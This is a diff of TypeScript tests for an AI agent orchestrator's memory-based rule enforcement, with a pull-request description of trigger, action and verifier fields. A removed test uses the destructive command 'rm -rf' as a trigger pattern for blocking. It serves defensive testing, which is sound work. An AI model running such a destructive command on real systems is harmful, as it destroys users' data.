 import { describe, it } from "node:test";
 import assert from "node:assert/strict";
 import os from "node:os";
+import fs from "node:fs";
+import path from "node:path";
 import {
   matchBashCommand,
   matchToolCall,
   executeAction,
+  loadEnforcedEntries,
+  loadVerifierEntries,
   type EnforcedEntry,
 } from "../../../extensions/orchestrator/enforcement-rules.ts";
-import type { ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.ts";
+import { entryHash, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.ts";
 
 // ── Helpers ────────────────────────────────────────────────────────────────
 
@@ -239,5 +243,189 @@ describe("matchToolCall — file_modified exact path", () => {
       path: "path/to/Makefile",
     });
     assert.equal(matches.length, 0);
+  });
+});
+
+// ── loadEnforcedEntries — filesystem integration ───────────────────────────
+
+describe("loadEnforcedEntries — returns entries with trigger and action", () => {
+  const entryText = "test rule";
+  const entryLine = "- [lesson] test rule";
+  const hash = entryHash(entryLine);
+  const now = new Date().toISOString();
+
+  function makeTmpDir(): string {
+    const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "enforcement-test-"));
+    const memoryDir = path.join(tmpDir, ".pi", "memory");
+    const topicsDir = path.join(memoryDir, "topics");
+    fs.mkdirSync(topicsDir, { recursive: true });
+    return tmpDir;
+  }
+
+  it("returns entry with trigger and action", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const scoresFile = {
+        entries: {
+          [hash]: {
+            class: "lesson",
+            score: 1.0,
+            evidenceCount: 1,
+            cue: "explicit",
+            firstSeen: now,
+            lastReinforced: now,
+            userState: "auto",
+            lifecycle: "active",
+            trigger: "bash_contains test",
+            action: "block",
+          },
+        },
+        lastRebuild: now,
+      };
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+        JSON.stringify(scoresFile),
+      );
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "topics", "lessons.md"),
+        "# Lessons\n- [lesson] test rule\n",
+      );
+
+      const entries = loadEnforcedEntries(tmpDir);
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].text, entryText);
+      assert.equal(entries[0].trigger, "bash_contains test");
+      assert.equal(entries[0].action, "block");
+      assert.equal(entries[0].hash, hash);
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
+  });
+
+  it("excludes entries without trigger or action", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const scoresFile = {
+        entries: {
+          [hash]: {
+            class: "lesson",
+            score: 1.0,
+            evidenceCount: 1,
+            cue: "explicit",
+            firstSeen: now,
+            lastReinforced: now,
+            userState: "auto",
+            lifecycle: "active",
+            // No trigger or action
+          },
+        },
+        lastRebuild: now,
+      };
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+        JSON.stringify(scoresFile),
+      );
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "topics", "lessons.md"),
+        "# Lessons\n- [lesson] test rule\n",
+      );
+
+      const entries = loadEnforcedEntries(tmpDir);
+      assert.equal(entries.length, 0);
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ── loadVerifierEntries — filesystem integration ───────────────────────────
+
+describe("loadVerifierEntries — returns entries with verifier field", () => {
+  const entryText = "always ask before merging";
+  const entryLine = "- [lesson] always ask before merging";
+  const hash = entryHash(entryLine);
+  const now = new Date().toISOString();
+
+  function makeTmpDir(): string {
+    const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "verifier-test-"));
+    const memoryDir = path.join(tmpDir, ".pi", "memory");
+    const topicsDir = path.join(memoryDir, "topics");
+    fs.mkdirSync(topicsDir, { recursive: true });
+    return tmpDir;
+  }
+
+  it("returns entry with verifier field", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const scoresFile = {
+        entries: {
+          [hash]: {
+            class: "lesson",
+            score: 1.0,
+            evidenceCount: 1,
+            cue: "explicit",
+            firstSeen: now,
+            lastReinforced: now,
+            userState: "auto",
+            lifecycle: "active",
+            verifier: "tool_called ask_user before gh pr merge",
+          },
+        },
+        lastRebuild: now,
+      };
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+        JSON.stringify(scoresFile),
+      );
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "topics", "lessons.md"),
+        "# Lessons\n- [lesson] always ask before merging\n",
+      );
+
+      const entries = loadVerifierEntries(tmpDir);
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].text, entryText);
+      assert.equal(entries[0].verifier, "tool_called ask_user before gh pr merge");
+      assert.equal(entries[0].hash, hash);
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
+  });
+
+  it("excludes entries without verifier", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const scoresFile = {
+        entries: {
+          [hash]: {
+            class: "lesson",
+            score: 1.0,
+            evidenceCount: 1,
+            cue: "explicit",
+            firstSeen: now,
+            lastReinforced: now,
+            userState: "auto",
+            lifecycle: "active",
+            trigger: "bash_contains test",
+            action: "warn",
+            // No verifier
+          },
+        },
+        lastRebuild: now,
+      };
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+        JSON.stringify(scoresFile),
+      );
+      fs.writeFileSync(
+        path.join(tmpDir, ".pi", "memory", "topics", "lessons.md"),
+        "# Lessons\n- [lesson] always ask before merging\n",
+      );
+
+      const entries = loadVerifierEntries(tmpDir);
+      assert.equal(entries.length, 0);
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
   });
 });

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -137,48 +137,10 @@ describe("matchToolCall — bash trigger via bash tool", () => {
   });
 });
 
-// ── matchToolCall — subagent task text matches bash_contains trigger ───────
 
-describe("matchToolCall — subagent task text matches bash_contains trigger", () => {
-  const entry = makeEntry("bash_contains git commit");
+// Subagent matching uses structured tool call extraction (tool_result hook),
+// not task text matching. See enforcement.ts for the implementation.
 
-  it("matches when subagent task contains the trigger text", () => {
-    const matches = matchToolCall([entry], "subagent", {
-      task: "Stage files and git commit -m 'test'",
-      agent: "git-expert",
-      cwd: "/tmp",
-    });
-    assert.equal(matches.length, 1);
-    assert.equal(matches[0].matched, "git commit");
-    assert.strictEqual(matches[0].rule, entry);
-  });
-
-  it("does not match when subagent task does not contain trigger text", () => {
-    const matches = matchToolCall([entry], "subagent", {
-      task: "Run tests",
-      agent: "test-runner",
-      cwd: "/tmp",
-    });
-    assert.equal(matches.length, 0);
-  });
-});
-
-// ── matchToolCall — subagent task text does not match unrelated trigger ────
-
-describe("matchToolCall — subagent task text does not match unrelated trigger", () => {
-  const entry = makeEntry("bash_contains rm -rf");
-
-  it("does not match when subagent task has no relation to trigger", () => {
-    const matches = matchToolCall([entry], "subagent", {
-      task: "git push origin main",
-      agent: "git-expert",
-      cwd: "/tmp",
-    });
-    assert.equal(matches.length, 0);
-  });
-});
-
-// ── matchBashCommand — matches against subagent result text ────────────────
 
 describe("matchBashCommand — matches against subagent result text", () => {
   const entry = makeEntry("bash_contains Committed", "warn");

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -574,6 +574,7 @@ describe("rebuild — orphan preservation for enforced entries", () => {
           lifecycle: "active",
           trigger: "bash_contains git push",
           action: "run_after",
+          actionCommand: "echo enforced",
         },
         [triggerOnlyHash]: {
           class: "lesson",


### PR DESCRIPTION
## Summary

Closes #577

Adds a code-enforcement layer to the existing memory system. Memory entries can now have optional `trigger`, `action`, and `verifier` fields that enable runtime enforcement — the LLM cannot ignore enforced rules because code checks and acts on them.

Based on the TRACE research paper (Notre Dame, June 2026) which proved that memory retrieval alone leaves 57.5% of preferences violated (the "access-compliance gap"). The fix is changing the representation from "remembered advice" to "runtime constraint that must pass."

## Architecture

Same `.pi/memory/` storage. Same scoring. Same tools. No second system. Enforcement fields are optional on existing `ScoredEntry`:

- **`trigger`** — what activates the rule: `bash_contains <str>`, `bash_regex <pattern>`, `tool_name <name>`, `file_modified <glob>`
- **`action`** — what to do: `block` (prevent), `run_after` (execute command after), `warn` (append warning)
- **`verifier`** — semantic condition checked at turn_end: `tool_called <tool> before <command>`

Enforcement hooks:
- **`tool_result`** — after a tool completes, checks triggers → executes block/run_after/warn
- **`turn_end`** — checks semantic verifiers → forces retry via `sendMessage(triggerTurn: true)` on violations

Memory injection moved to **tail position** in system prompt (research proves tail gets highest LLM attention).

## Changes

| File | Change |
|---|---|
| `memory-scoring.ts` | `EnforcementTrigger`, `EnforcementAction` types + optional fields on `ScoredEntry` |
| `memory-tools.ts` | `memory_add` accepts `trigger`, `action`, `verifier` params |
| `enforcement-rules.ts` | **NEW** — trigger matching engine + action execution |
| `enforcement.ts` | `tool_result` hook for deterministic enforcement |
| `rules.ts` | `turn_end` semantic enforcement + memory injection moved to tail |
| `AGENTS.md` | Layer 5 documentation, repo structure, pipeline updates |
| `README.md` | Feature table entry |
| `enforcement-rules.test.ts` | **NEW** — 12 tests for trigger matching + action execution |

## Done

- [x] Add trigger/action/verifier fields to ScoredEntry
- [x] Extend memory_add to accept enforcement params
- [x] Build enforcement-rules.ts engine (trigger matching, action execution)
- [x] Add tool_result hook for deterministic enforcement
- [x] Add turn_end semantic enforcement with forced retry
- [x] Move memory injection to system prompt tail
- [x] Write 12 tests (71 total Node tests pass)
- [x] Update AGENTS.md + README.md